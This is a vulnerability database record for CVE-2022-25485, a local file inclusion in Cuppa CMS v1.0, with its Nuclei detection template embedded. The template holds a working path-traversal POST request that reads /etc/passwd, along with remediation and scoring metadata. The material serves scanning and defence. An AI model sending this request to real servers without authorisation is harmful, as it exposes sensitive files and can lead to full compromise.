{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-25485/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-25485/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-25485/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-25485/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-25485/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-25485"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-25485"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-25485.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2022-25485\n\ninfo:\n  name: Cuppa CMS v1.0 - Local File Inclusion\n  author: theamanrawat\n  severity: high\n  description: |\n    CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n  remediation: |\n    Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability.\n  reference:\n    - https://github.com/CuppaCMS/CuppaCMS\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-25485\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n    cvss-score: 7.8\n    cve-id: CVE-2022-25485\n    cwe-id: CWE-829\n    epss-score: 0.07927\n    epss-percentile: 0.94516\n    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cuppacms\n    product: cuppacms\n  tags: cve,cve2022,lfi,cuppa,cuppacms,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /alerts/alertLightbox.php  HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        url=../../../../../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100c77ff998f6896ca2713a008f2f4b1a68b31963f9de35c05e9ae2f6e2e713f89302210091b2d1b279f241f2c5a2b19f46d16d19b03185b66f449af921434ebadad1aabe:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-25485"
}